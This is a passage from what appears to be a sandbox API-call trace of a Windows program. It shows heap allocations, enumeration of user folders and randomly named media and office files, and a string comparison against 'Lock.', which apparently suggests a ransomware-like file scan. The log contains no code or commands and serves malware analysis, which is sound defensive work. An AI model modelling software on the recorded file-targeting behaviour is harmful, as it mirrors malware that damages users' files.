dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0112.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0112.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0112.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0112.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0112.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0112.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0112.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0112.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0112.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0112.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0112.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0112.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0112.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0112.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0112.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0112.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0112.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0112.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0112.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0112.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0112.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0112.484] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0e61f40, ftCreationTime.dwHighDateTime=0x1d5c949, ftLastAccessTime.dwLowDateTime=0x84eb2f50, ftLastAccessTime.dwHighDateTime=0x1d5c906, ftLastWriteTime.dwLowDateTime=0x84eb2f50, ftLastWriteTime.dwHighDateTime=0x1d5c906, nFileSizeHigh=0x0, nFileSizeLow=0x13dfb, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="1px3r9YZM.gif", cAlternateFileName="1PX3R9~1.GIF")) returned 1 [0112.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0112.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0112.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0112.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0112.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0112.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0112.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0112.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0112.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0112.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0112.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0112.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0112.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0112.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0112.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0112.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0112.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0112.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0112.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0112.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0112.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6370 | out: hHeap=0x2af0000) returned 1 [0112.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0112.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0112.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0112.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0112.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0112.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0112.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0112.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0112.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0112.485] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77be1430, ftCreationTime.dwHighDateTime=0x1d5ca39, ftLastAccessTime.dwLowDateTime=0xfbe1e9a0, ftLastAccessTime.dwHighDateTime=0x1d5d1da, ftLastWriteTime.dwLowDateTime=0xfbe1e9a0, ftLastWriteTime.dwHighDateTime=0x1d5d1da, nFileSizeHigh=0x0, nFileSizeLow=0x161dc, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="5sRVNiax4.mp4", cAlternateFileName="5SRVNI~1.MP4")) returned 1 [0112.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0112.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0112.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0112.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0112.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0112.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0112.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0112.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0112.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0112.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0112.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0112.485] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7161656c, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x7b7983c6, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0112.485] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd69521b0, ftCreationTime.dwHighDateTime=0x1d5cc2d, ftLastAccessTime.dwLowDateTime=0x7b660ee0, ftLastAccessTime.dwHighDateTime=0x1d5d771, ftLastWriteTime.dwLowDateTime=0x7b660ee0, ftLastWriteTime.dwHighDateTime=0x1d5d771, nFileSizeHigh=0x0, nFileSizeLow=0x9ff1, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="bNDu1R0FYJg.wav", cAlternateFileName="BNDU1R~1.WAV")) returned 1 [0112.485] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c861d80, ftCreationTime.dwHighDateTime=0x1d5cf37, ftLastAccessTime.dwLowDateTime=0x3c29f900, ftLastAccessTime.dwHighDateTime=0x1d5d602, ftLastWriteTime.dwLowDateTime=0x3c29f900, ftLastWriteTime.dwHighDateTime=0x1d5d602, nFileSizeHigh=0x0, nFileSizeLow=0x14d04, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="DjTk 0Dq17Pz4t2AMa.png", cAlternateFileName="DJTK0D~1.PNG")) returned 1 [0112.486] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2b359c0, ftCreationTime.dwHighDateTime=0x1d5d400, ftLastAccessTime.dwLowDateTime=0x36e47fd0, ftLastAccessTime.dwHighDateTime=0x1d5cefd, ftLastWriteTime.dwLowDateTime=0x36e47fd0, ftLastWriteTime.dwHighDateTime=0x1d5cefd, nFileSizeHigh=0x0, nFileSizeLow=0x98c4, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="DZjNZY.gif", cAlternateFileName="")) returned 1 [0112.486] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6173d640, ftCreationTime.dwHighDateTime=0x1d5d355, ftLastAccessTime.dwLowDateTime=0x400efdf0, ftLastAccessTime.dwHighDateTime=0x1d5ca26, ftLastWriteTime.dwLowDateTime=0x400efdf0, ftLastWriteTime.dwHighDateTime=0x1d5ca26, nFileSizeHigh=0x0, nFileSizeLow=0x13aff, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="F74jGmHWDSdyxplK8Zu.gif", cAlternateFileName="F74JGM~1.GIF")) returned 1 [0112.486] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cce37f0, ftCreationTime.dwHighDateTime=0x1d5cb43, ftLastAccessTime.dwLowDateTime=0x503c5ad0, ftLastAccessTime.dwHighDateTime=0x1d5d235, ftLastWriteTime.dwLowDateTime=0x503c5ad0, ftLastWriteTime.dwHighDateTime=0x1d5d235, nFileSizeHigh=0x0, nFileSizeLow=0x7ba2, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="fM4.mkv", cAlternateFileName="")) returned 1 [0112.631] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0a03850, ftCreationTime.dwHighDateTime=0x1d5c867, ftLastAccessTime.dwLowDateTime=0xc6771720, ftLastAccessTime.dwHighDateTime=0x1d5d632, ftLastWriteTime.dwLowDateTime=0xc6771720, ftLastWriteTime.dwHighDateTime=0x1d5d632, nFileSizeHigh=0x0, nFileSizeLow=0x18011, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="GYS46AI.wav", cAlternateFileName="")) returned 1 [0112.631] TranslateMessage (lpMsg=0x8cf618) returned 0 [0112.631] DispatchMessageW (lpMsg=0x8cf618) returned 0x0 [0112.631] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0112.631] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0112.631] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0112.632] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68a94210, ftCreationTime.dwHighDateTime=0x1d5d3d7, ftLastAccessTime.dwLowDateTime=0x21380940, ftLastAccessTime.dwHighDateTime=0x1d5cc78, ftLastWriteTime.dwLowDateTime=0x21380940, ftLastWriteTime.dwHighDateTime=0x1d5cc78, nFileSizeHigh=0x0, nFileSizeLow=0x5974, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="lNMKqFE.odt", cAlternateFileName="")) returned 1 [0112.632] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc403710, ftCreationTime.dwHighDateTime=0x1d5d443, ftLastAccessTime.dwLowDateTime=0x6b4df440, ftLastAccessTime.dwHighDateTime=0x1d5ca6b, ftLastWriteTime.dwLowDateTime=0x6b4df440, ftLastWriteTime.dwHighDateTime=0x1d5ca6b, nFileSizeHigh=0x0, nFileSizeLow=0xf524, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="m3JGHdzSozsPviDT.jpg", cAlternateFileName="M3JGHD~1.JPG")) returned 1 [0112.632] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53cdcf0, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xd35c70fc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe53cf090, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Macromedia", cAlternateFileName="MACROM~1")) returned 1 [0112.632] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee6ea6d8, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0112.632] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfd8b64ce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfd8b64ce, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0112.632] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x290572c0, ftCreationTime.dwHighDateTime=0x1d5c9ee, ftLastAccessTime.dwLowDateTime=0x36ad780, ftLastAccessTime.dwHighDateTime=0x1d5d36c, ftLastWriteTime.dwLowDateTime=0x36ad780, ftLastWriteTime.dwHighDateTime=0x1d5d36c, nFileSizeHigh=0x0, nFileSizeLow=0x44c4, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="NERYDfycG70.mp3", cAlternateFileName="NERYDF~1.MP3")) returned 1 [0112.632] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21139bb0, ftCreationTime.dwHighDateTime=0x1d5d618, ftLastAccessTime.dwLowDateTime=0xd776c210, ftLastAccessTime.dwHighDateTime=0x1d5d744, ftLastWriteTime.dwLowDateTime=0xd776c210, ftLastWriteTime.dwHighDateTime=0x1d5d744, nFileSizeHigh=0x0, nFileSizeLow=0xc550, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="nst7Asd C.png", cAlternateFileName="NST7AS~1.PNG")) returned 1 [0112.632] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2f9bdd0, ftCreationTime.dwHighDateTime=0x1d5d54e, ftLastAccessTime.dwLowDateTime=0x84f14450, ftLastAccessTime.dwHighDateTime=0x1d5cf5d, ftLastWriteTime.dwLowDateTime=0x84f14450, ftLastWriteTime.dwHighDateTime=0x1d5cf5d, nFileSizeHigh=0x0, nFileSizeLow=0x62c, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="NWn0_eXN3pgA63Ym.mkv", cAlternateFileName="NWN0_E~1.MKV")) returned 1 [0112.632] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6602990, ftCreationTime.dwHighDateTime=0x1d5ca1f, ftLastAccessTime.dwLowDateTime=0x65ec1cd0, ftLastAccessTime.dwHighDateTime=0x1d5cd53, ftLastWriteTime.dwLowDateTime=0x65ec1cd0, ftLastWriteTime.dwHighDateTime=0x1d5cd53, nFileSizeHigh=0x0, nFileSizeLow=0x17b50, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="PN5TTWYWv642BYt.png", cAlternateFileName="PN5TTW~1.PNG")) returned 1 [0112.632] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef3560a0, ftCreationTime.dwHighDateTime=0x1d5c97f, ftLastAccessTime.dwLowDateTime=0x5010b180, ftLastAccessTime.dwHighDateTime=0x1d5cb93, ftLastWriteTime.dwLowDateTime=0x5010b180, ftLastWriteTime.dwHighDateTime=0x1d5cb93, nFileSizeHigh=0x0, nFileSizeLow=0x15b38, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Pvmhff.flv", cAlternateFileName="")) returned 1 [0112.632] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b1dd180, ftCreationTime.dwHighDateTime=0x1d5d285, ftLastAccessTime.dwLowDateTime=0x24619f50, ftLastAccessTime.dwHighDateTime=0x1d5c7a0, ftLastWriteTime.dwLowDateTime=0x24619f50, ftLastWriteTime.dwHighDateTime=0x1d5c7a0, nFileSizeHigh=0x0, nFileSizeLow=0x942f, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="rCxPhCicoc5u7sEbYlz.ots", cAlternateFileName="RCXPHC~1.OTS")) returned 1 [0112.633] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc32710, ftCreationTime.dwHighDateTime=0x1d5cd3c, ftLastAccessTime.dwLowDateTime=0x2c24e6a0, ftLastAccessTime.dwHighDateTime=0x1d5d7a1, ftLastWriteTime.dwLowDateTime=0x2c24e6a0, ftLastWriteTime.dwHighDateTime=0x1d5d7a1, nFileSizeHigh=0x0, nFileSizeLow=0x7af, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="s4dSYQJ4.xlsx", cAlternateFileName="S4DSYQ~1.XLS")) returned 1 [0112.633] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5c77649, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd5c77649, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xd5c77649, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Skype", cAlternateFileName="")) returned 1 [0112.633] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d140e20, ftCreationTime.dwHighDateTime=0x1d5d394, ftLastAccessTime.dwLowDateTime=0xa6c241d0, ftLastAccessTime.dwHighDateTime=0x1d5ce4d, ftLastWriteTime.dwLowDateTime=0xa6c241d0, ftLastWriteTime.dwHighDateTime=0x1d5ce4d, nFileSizeHigh=0x0, nFileSizeLow=0xfbac, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="sn-hlisepFoxRII.xls", cAlternateFileName="SN-HLI~1.XLS")) returned 1 [0112.633] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4894b540, ftCreationTime.dwHighDateTime=0x1d5cdce, ftLastAccessTime.dwLowDateTime=0x98776f80, ftLastAccessTime.dwHighDateTime=0x1d5c8ce, ftLastWriteTime.dwLowDateTime=0x98776f80, ftLastWriteTime.dwHighDateTime=0x1d5c8ce, nFileSizeHigh=0x0, nFileSizeLow=0x169ce, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="SROlf 2S5m.m4a", cAlternateFileName="SROLF2~1.M4A")) returned 1 [0112.633] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xad2cc5cd, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0112.633] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61a48910, ftCreationTime.dwHighDateTime=0x1d5cd48, ftLastAccessTime.dwLowDateTime=0x402b390, ftLastAccessTime.dwHighDateTime=0x1d5cfaf, ftLastWriteTime.dwLowDateTime=0x402b390, ftLastWriteTime.dwHighDateTime=0x1d5cfaf, nFileSizeHigh=0x0, nFileSizeLow=0x4d1e, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="UGbEnsFdWrF0NcSzWk2.pdf", cAlternateFileName="UGBENS~1.PDF")) returned 1 [0112.633] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe563b4e0, ftCreationTime.dwHighDateTime=0x1d5d41b, ftLastAccessTime.dwLowDateTime=0xe2e40150, ftLastAccessTime.dwHighDateTime=0x1d5ca77, ftLastWriteTime.dwLowDateTime=0xe2e40150, ftLastWriteTime.dwHighDateTime=0x1d5ca77, nFileSizeHigh=0x0, nFileSizeLow=0xad4f, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="V7-K_kNP-.pptx", cAlternateFileName="V7-K_K~1.PPT")) returned 1 [0112.633] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2812260, ftCreationTime.dwHighDateTime=0x1d5d6c2, ftLastAccessTime.dwLowDateTime=0xd82c4380, ftLastAccessTime.dwHighDateTime=0x1d5d26f, ftLastWriteTime.dwLowDateTime=0xd82c4380, ftLastWriteTime.dwHighDateTime=0x1d5d26f, nFileSizeHigh=0x0, nFileSizeLow=0x175f2, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="WvHidWJPV.m4a", cAlternateFileName="WVHIDW~1.M4A")) returned 1 [0112.633] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf02b7c0, ftCreationTime.dwHighDateTime=0x1d5d233, ftLastAccessTime.dwLowDateTime=0xe104e200, ftLastAccessTime.dwHighDateTime=0x1d5cb30, ftLastWriteTime.dwLowDateTime=0xe104e200, ftLastWriteTime.dwHighDateTime=0x1d5cb30, nFileSizeHigh=0x0, nFileSizeLow=0x14669, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="xin7s.odp", cAlternateFileName="")) returned 1 [0112.633] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10a83210, ftCreationTime.dwHighDateTime=0x1d5cc61, ftLastAccessTime.dwLowDateTime=0x5e8983f0, ftLastAccessTime.dwHighDateTime=0x1d5c796, ftLastWriteTime.dwLowDateTime=0x5e8983f0, ftLastWriteTime.dwHighDateTime=0x1d5c796, nFileSizeHigh=0x0, nFileSizeLow=0xd7ac, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="x_7SfFt5-eJAhmf88.gif", cAlternateFileName="X_7SFF~1.GIF")) returned 1 [0112.633] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2af0000, ftCreationTime.dwHighDateTime=0x8cf2b0, ftLastAccessTime.dwLowDateTime=0x2af0000, ftLastAccessTime.dwHighDateTime=0x18, ftLastWriteTime.dwLowDateTime=0x3, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Ƙʦ桰ʪⷾ瞉", cAlternateFileName="踚@鐔ʯ\x8c蘔J㳻@腸J\x8c\x8c㵶@\x8c\x8c藴Ja")) returned 0 [0112.633] FindClose (in: hFindFile=0x9a4440 | out: hFindFile=0x9a4440) returned 1 [0112.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-M_4r.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0112.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M_4r.mp4", cchCount1=5, 